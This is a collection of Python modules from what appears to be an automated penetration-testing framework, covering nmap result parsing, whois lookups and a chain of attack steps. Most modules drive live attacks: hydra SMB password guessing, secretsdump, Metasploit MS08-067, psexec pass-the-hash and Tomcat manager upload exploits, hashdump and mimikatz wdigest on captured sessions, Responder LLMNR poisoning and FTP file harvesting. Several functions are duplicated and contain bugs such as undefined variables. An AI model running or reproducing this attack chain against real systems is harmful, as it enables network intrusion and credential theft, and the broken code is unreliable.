def processOs(self, host, os): osStr = "" osStrAcc = 0 for osmatch in os.findall('osmatch'): osStr_tmp = osmatch.attrib['name'] if osmatch.attrib['name'] else "" osStrAcc_tmp = osmatch.attrib['accuracy'] if osmatch.attrib[ 'accuracy'] else "" if (int(osStrAcc_tmp) > osStrAcc): osStrAcc = int(osStrAcc_tmp) osStr = osStr_tmp osFam = "" osGen = "" osClassAcc = 0 for osclass in os.findall('osclass'): # print osclass.attrib['type'] # print osclass.attrib['vendor'] osFam_tmp = osclass.attrib['osfamily'] if osclass.attrib[ 'osfamily'] else "" osGen_tmp = osclass.attrib['osgen'] if osclass.attrib[ 'osgen'] else "" osClassAcc_tmp = osclass.attrib['accuracy'] if osclass.attrib[ 'accuracy'] else "" if (int(osClassAcc_tmp) > osClassAcc): osClassAcc = int(osClassAcc_tmp) osFam = osFam_tmp osGen = osGen_tmp kb.add('host/' + host + '/os/' + osFam + ' ' + osGen)
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # test for NULL authentication first if not self.seentarget(t): self.addseentarget(t) self.searchTarget(t, '', '', '') # test for any local users for user in self.getUsers(t): passwords = kb.get(['creds/host/' + t + '/username/' + user + '/password']) for password in passwords: if not self.seentarget(t + user + password): self.addseentarget(t + user + password) self.searchTarget(t, user, password, "") # test for any domain users domains = kb.get("host/" + t + "/domain") for domain in domains: for user in self.getDomainUsers(domain): passwords = kb.get(['creds/domain/' + t + '/username/' + user + '/password']) for password in passwords: if not self.seentarget(t + user + password + domain): self.addseentarget(t + user + password + domain) self.searchTarget(t, user, password, domain) return
def processTarget(self, t, port): if not self.seentarget(t + str(port)): self.addseentarget(t + str(port)) self.display.verbose(self.shortName + " - Connecting to " + t) try: conn = httplib.HTTPConnection(t, port, timeout=10) conn.request('GET', '/') response = conn.getresponse() serverver = response.getheader('server') if (serverver): outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + str( port) + "_" + Utils.getRandStr(10) Utils.writeFile( "Identified Server Version of %s : %s\n\nFull Headers:\n%s" % (t, serverver, self.print_dict(response.getheaders())), outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) except httplib.BadStatusLine: pass # except socket.error as e: except: pass
def processService(self, host, port, proto, service): name = "" product = "" version = "" for key, value in service.attrib.items(): if key == 'name': name = value if "http" in name: if "https" in name: name = "https" elif "ssl" in name: name = "https" else: name = "http" original = value # print "NMAP -- " + original + " -- " + name elif key == 'product': product = value elif key == 'version': version = value # elif key == 'ostype': # print value # elif key == 'method': # print value # elif key == 'conf': # print value kb.add('service/' + name + '/' + host + '/' + proto + '/' + port + '/version/' + product + ' ' + version) EventHandler.fire("newService_" + name + ":" + self.vector)
def addVuln(self, host, vuln, details={}): self.display.error("VULN [%s] Found on [%s]" % (vuln, host)) kb.add("vuln/host/" + host + "/" + vuln + "/module/" + self.shortName + "/" + self.vector) for key in details: kb.add("vuln/host/" + host + "/" + vuln + "/details/" + key + "/" + details[key])
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # test for NULL authentication first if not self.seentarget(t): self.addseentarget(t) self.searchTarget(t, '', '', '') # test for any local users for user in self.getUsers(t): passwords = kb.get( ['creds/host/' + t + '/username/' + user + '/password']) for password in passwords: if not self.seentarget(t + user + password): self.addseentarget(t + user + password) self.searchTarget(t, user, password, "") # test for any domain users domains = kb.get("host/" + t + "/domain") for domain in domains: for user in self.getDomainUsers(domain): passwords = kb.get([ 'creds/domain/' + t + '/username/' + user + '/password' ]) for password in passwords: if not self.seentarget(t + user + password + domain): self.addseentarget(t + user + password + domain) self.searchTarget(t, user, password, domain) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = kb.get(['host/' + t + '/user']) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) passwords = kb.get(['host/' + t + '/user/' + user + '/password']) for password in passwords: self.display.verbose(self.shortName + " - Connecting to " + t) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr( 10) # run secretesdump.py command = "secretsdump.py -outputfile " + temp_file + " \"" + user + "\":\"" + password + \ "\"@" + t result = Utils.execWait(command, None) # TODO # parse out put and store any new info and fire any additional triggers return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = self.getUsers(t) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) # make outfile temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) command = self.config["hydra"] + " -s 445 -l " + user + " -P " + self.config[ "miscDir"] + "passwords.txt smb://" + t result = Utils.execWait(command, temp_file, timeout=30) # Extract usernames & passwords from results and add to KB parts = re.findall(".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result) for part in parts: self.fire("newSmbPassword") self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")}) self.display.debug( "Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t) kb.add("creds/host/" + t + "/username/" + part[0].strip() + "/password/" + part[1].strip()) return
def processIPs(self, vector): for host in self.nm.all_hosts(): good = False for proto in self.nm[host].all_protocols(): if (good): break lport = list(self.nm[host][proto].keys()) lport.sort() for port in lport: if (good): break if (self.nm[host][proto][port]["state"] == "open"): good = True if (good): kb.add('host/' + host) # fire new event for "newHost" EventHandler.fire("newIP" + ":" + vector) # process ports self.processPorts(host, vector) # process hostscripts if ("hostscript" in self.nm[host]): self.processHostScripts(host, vector) return
def searchTarget(self, target, port, username, password): success = False # start packet capture cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10, srcip="", dstip=target) try: if (Utils.port_open(target, 21)): # attempt to connect to the remote host with ftputil.FTPHost(target, username, password) as host: success = True # get list of files and loop over them recursive = host.walk("/", topdown=True, onerror=None) for root, dirs, files in recursive: for name in files: for pattern in self.filepatterns: match_list = fnmatch.filter(files, pattern) for fname in match_list: fpath = host.path.join(root, fname) if host.path.isfile(fpath): host.download(fpath, self.config["proofsDir"] + ip + fpath.replace("/", "_")) host.close() except ftputil.error.PermanentError: self.display.error("Could not connect to %s on port 21" % (target)) outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str( port) + "_" + target + "_" + Utils.getRandStr(10) Utils.writeFile(self.getPktCap(cap), outfile) kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) return success
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: cmd = { 'config': [ "use auxiliary/scanner/snmp/snmp_enumshares", "set RHOSTS %s" % t, "set COMMUNITY %s" % comString ], 'payload': 'none' } result, outfile = self.msfExec(t, cmds) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("share/smb/" + t + "/" + sharename) return
def process(self): # early out if the osint depth is reached if (int(self.getVectorDepth()) > int(self.config['max_osint_depth'])): return # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the to the already seen list self.addseentarget(t) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = whois.whois(t) address = result['address'] if address: kb.add("osint/address/" + address) emails = result['emails'] if emails: for email in emails: kb.add("osint/email/" + email) Utils.writeFile(str(result), temp_file) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new target to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Targetting " + t) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) # perform web stie request and parsing result = self.search(t) for line in result: kb.add("osint/dnsdomain/host/t") self.fire("newHost") text = ', '.join(result) Utils.writeFile(text, temp_file) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) cmd = { 'config': [ "use exploit/windows/smb/ms08_067_netapi", "set TARGET 0", "set RHOST %s" % t ], 'payload': 'win' } result, outfile = self.msfExec(t, cmds) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("hell" + t + "/msf/" + str(part)) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) cstrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for community in cstrings: command = self.config[ "snmpwalk"] + " -v 2c -c " + community + " " + t result = command + "\n" + Utils.execWait( command) #append command to top of output outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/vuln/snmpCred/output/" + outfile.replace("/", "%2F")) return
def process(self): # early out if the osint depth is reached if (int(self.getVectorDepth()) <= int(self.config['max_osint_depth'])): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the to the already seen list self.addseentarget(t) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) obj = ipwhois.IPWhois(t) result = obj.lookup_rdap() cidr = result['network']['cidr'] if cidr: net = IPNetwork(cidr) added = False for ip in list(net): if not str(ip) in self.targets: kb.add("osint/host/" + str(ip)) added = True if added: self.fire("newHost") Utils.writeFile(str(result), temp_file) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # run nmap n = mynmap(self.config, self.display) scan_results = n.run(target=t, flags="--script=smb-enum-shares", ports="445", vector=self.vector, filetag=t + "_SMBSHARESCAN")['scan'] tree = ET.parse(n.outfile + '.xml') root = tree.getroot() for table in root.iter('table'): sharename = table.attrib["key"] for elem in table: if elem.text is not None: kb.add("host/" + t + "/shares/SMB/" + sharename + "/" + str(elem.attrib['key'] + ": " + elem.text).replace("/", "%2F")) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: users = self.getUsers(t) for user in users: hashes = kb.get ("creds/host/" + t + "/username/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t+user+passhash): # add the new IP to the already seen list self.addseentarget(t+user+passhash) cmd = { 'config':[ "use exploit/windows/smb/psexec", "set RPORT 445", "set RHOST %s" % t, "set SMBUser %s" % user, "set SMBPass %s" % passhash ], 'payload':'win'} result, outfile = self.msfExec(t, cmds) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("shell/" + t + "/msf/" + str(part)) return
def searchTarget(self, target, port, username, password): success = False # start packet capture # cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10, # srcip="", dstip=target) try: if (Utils.port_open(target, 21)): # attempt to connect to the remote host with ftputil.FTPHost(target, username, password) as host: success = True # get list of files and loop over them recursive = host.walk("/", topdown=True, onerror=None) for root, dirs, files in recursive: for name in files: for pattern in self.filepatterns: match_list = fnmatch.filter(files, pattern) for fname in match_list: fpath = host.path.join(root, fname) if host.path.isfile(fpath): host.download( fpath, self.config["proofsDir"] + ip + fpath.replace("/", "_")) host.close() except ftputil.error.PermanentError: self.display.error("Could not connect to %s on port 21" % (target)) # outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str( # port) + "_" + target + "_" + Utils.getRandStr(10) # Utils.writeFile(self.getPktCap(cap), outfile) kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) return success
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("getuid\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") outfile = self.config[ "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in text.splitlines(): m = re.match(r'^\s*Server username: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running as user [" + m.group(1).strip() + "]") msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("sysinfo\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") outfile = self.config[ "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in text.splitlines(): m = re.match(r'^\s*OS\s\s*: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running on OS [" + m.group(1).strip() + "]") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: myMsf.lock.acquire() msf.execute( "use auxiliary/scanner/snmp/snmp_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Extract usernames from results and add to KB parts = re.findall(".* users: .*", result) for part in parts: userlist = (part.split(':')[2]).split(',') for username in userlist: kb.add("creds/host/" + t + "/username/" + username.strip()) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("hashdump\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB # regex match on [^:]+:[^:]+:[^:]+:[^:]+::: outfile = self.config[ "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("load mimikatz\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("wdigest\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: # verify we have not tested this host before if not self.seentarget(t + p): # add the new IP to the already seen list self.addseentarget(t + p) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute( "use auxiliary/scanner/http/tomcat_mgr_login\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set RPORT %s\n" % p) msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in result.splitlines(): m = re.match(r'.*Successful: (.*):(.*)', line) if (m): self.display.error("Tomcat on [" + t + ":" + p + "] has default creds of [" + m.group(1).strip() + "]/[" + m.group(2).strip() + "]") kb.add("creds/service/tomcat/" + t + "/tcp/" + p + "/username/" + m.group(1).strip() + "/password/" + m.group(2).strip()) self.fire("newTomcatPassword") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('shell/' + t + '/msf') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) myMsf.lock.acquire() msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("hashdump\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") msf.sleep(int(self.config['msfexploitdelay'])) # TODO - process results and store results in KB # regex match on [^:]+:[^:]+:[^:]+:[^:]+::: outfile = self.config[ "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() myMsf.lock.release() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("load mimikatz\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("wdigest\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: users = kb.get("creds/service/tomcat/" + t + "/tcp/" + p + "/username") for user in users: passwords = kb.get("creds/service/tomcat/" + t + "/tcp/" + p + "/username/" + user + "/password") for password in passwords: # verify we have not tested this host before if not self.seentarget(t + p + user + password): # add the new IP to the already seen list self.addseentarget(t + p + user + password) cmd = { 'config': [ "use exploit/multi/http/tomcat_mgr_upload", "set RHOST %s" % t, "set RPORT %s" % p, "set HTTPUSERNAME %s" % user, "set HTTPPASSWORD %s" % password, "set fingerprintcheck false", "set target 2" ], 'payload': 'win' } result, outfile = self.msfExec(t, cmds) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln( t, self.shortName, { "port": p, "username": user, "password": password, "output": outfile.replace( "/", "%2F") }) if callFire: self.fire("msfSession") return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: users = self.getUsers(t) for user in users: hashes = kb.get("creds/host/" + t + "/username/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t + user + passhash): # add the new IP to the already seen list self.addseentarget(t + user + passhash) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/psexec\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBUser " + user + "\n") msf.execute("set SMBPass " + passhash + "\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall( ".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("shell/" + t + "/msf/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self, inputfile): contents = [] with open(inputfile, "r") as myfile: contents = myfile.readlines() for line in contents: parts = line.strip().split(':=') kb.add("osint/" + parts[0].lower() + "/" + parts[1]) self.fire("new" + parts[0]) return
def process(self, inputfile): contents = [] with open (inputfile, "r") as myfile: contents = myfile.readlines() for line in contents: parts = line.strip().split(':=') kb.add("osint/" + parts[0].lower() + "/" + parts[1]) self.fire("new" + parts[0]) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString") for comString in comStrings: msf.execute( "use auxiliary/scanner/snmp/snmp_enumshares\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("run\n") result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("host/" + t + "/share/smb/" + sharename) # clean up after ourselves result = msf.cleanup() return
def process(self): default_interface = self.config["responder_iface"] default_delay = self.config["responder_delay"] #responder_path = self.config["responder_path"] my_ip = self.config["lhost"] # TODO # check to see if we got any creds # if not, wait 5 minutes and run again for 15 minutes # Extract usernames from results and add to KB found_hash = False times_run = 0 #while not found_hash and times_run < 4: self.display.output("Starting responder...") temp_file1 = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10) temp_file2 = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10) command = "python " + self.config["responder"] + " -I " + default_interface + " -i " + my_ip + " -wrf" # run for 15 minutes start_time = '{:%d-%m-%Y %H:%M:%S}'.format(datetime.datetime.now()) result = Utils.execWait(command, temp_file1, timeout=int(self.config["responder_timeout"])) responder_path, temp1 = os.path.split(self.config["responder"]) responder_db = responder_path + "/Responder.db" #STDOUT unreliable, grabbed hashes directly from the DB instead command = self.config["sqlite3"] + " " + responder_db + " \"select * from responder where timestamp > '" + start_time + "'\"" result = Utils.execWait(command, temp_file2, timeout=10) times_run += 1 #Have to account for responder not creating a new db file if nothing was found if not "no such table" in result: for part in result.splitlines(): found_hash = True #Found a hash, set to true to prevent loop record = part.split('|') if len(record) > 0: method = record[1] hashtype = record[2] host = record[3] username = record[5] domain = username.split('\\')[0] user = username.split('\\')[1] cleartext = record[6] shorthash = record[7] fullhash = record[8] self.display.error("Vuln [NetBIOS|LLMNR] Found new hash - ", fullhash) self.addVuln(host, "NetBIOS|LLMNR", {"port": "445", "output": temp_file2.replace("/", "%2F")}) kb.add("domain/" + domain + "/" + user + "/" + hashtype + "/" + fullhash) if len(cleartext) > 0: kb.add("creds/host/" + host + "/port/445/service/smb/username/" + user + "/password/" + cleartext) #if not found_hash: # time.sleep(300) # sleep for 5 minutes # repeat upto 5 4 times if found_hash: self.fire("newNTLMHash") return
def processPort(self, host, port): state = port.find('state').attrib['state'] if state == "open": portnum = port.attrib['portid'] proto = port.attrib['protocol'] kb.add('port/' + proto + '/' + portnum + '/' + host) EventHandler.fire("newPort_" + proto + '_' + portnum + ":" + self.vector) self.processService(host, portnum, proto, port.find('service')) for script in port.findall('script'): self.portScriptFunc (host, portnum, proto, script, self.outfile)
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/ms08_067_netapi\n") msf.execute("set TARGET 0\n") # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n") # msf.execute("set LHOST %s\n" % self.config['lhost']) # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort())) # msf.execute("set LPORT 4444\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBPIPE BROWSER\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("host/" + t + "/msfSession/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def processPort(self, host, port): state = port.find('state').attrib['state'] if state == "open": portnum = port.attrib['portid'] proto = port.attrib['protocol'] kb.add('port/' + proto + '/' + portnum + '/' + host) EventHandler.fire("newPort_" + proto + '_' + portnum + ":" + self.vector) self.processService(host, portnum, proto, port.find('service')) for script in port.findall('script'): self.portScriptFunc(host, portnum, proto, script, self.outfile)
def processService(self, host, port, proto, vector): product = self.nm[host][proto][port]["product"] version = self.nm[host][proto][port]["version"] name = self.nm[host][proto][port]["name"] kb.add('service/' + name + '/host/' + host + '/' + proto + 'port/' + str( port) + '/product' + product + '/version/' + str(version)) # print 'service/' + name + '/host/' + host + '/' + proto + 'port/' + str(port) + '/product' + product + # '/version/' + str(version) EventHandler.fire("newService" + str(name) + ":" + vector) if ("script" in self.nm[host][proto][port]): self.processScript(host, port, proto, vector) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) temp_file = self.config["proofsDir"] + Utils.getRandStr(10) # run nmap n = mynmap(self.config, self.diaplay) scan_results = n.run(target=t, flags="-sS -A", vector=self.vector)['scan'] # loop over scan results and do anything you need # fire any new triggers that are needed # self.fire("TEST123") for host in scan_results.keys(): # loop over each proto and process it for proto in ['tcp', 'udp']: if (proto in scan_results[host]): # loop over each proto and process it for port in scan_results[host][proto].keys(): # only worry about open ports if (scan_results[host][proto][port]["state"] == "open"): # fire event for "newPortXXX" self.fire("newPort" + str(port)) kb.add( 'host/' + host + '/' + proto + 'port', port) # process services and info s = scan_results[host][proto][port] # print "%s - %i/%s (%s) \"%s %s\" [%s]" % (host, port, proto, s['name'], # s['product'], s['version'], s['extrainfo']) if (s['name'] == 'http') or (s['name'] == 'https'): self.fire('web') # check for any scripts and loop over them if ('script' in scan_results[host][proto] [port].keys()): for script in scan_results[host][ proto][port]['script'].keys(): a = 1 # print " %s - [[%s]]" % (script, scan_results[host][proto][port][ # 'script'][script]) return
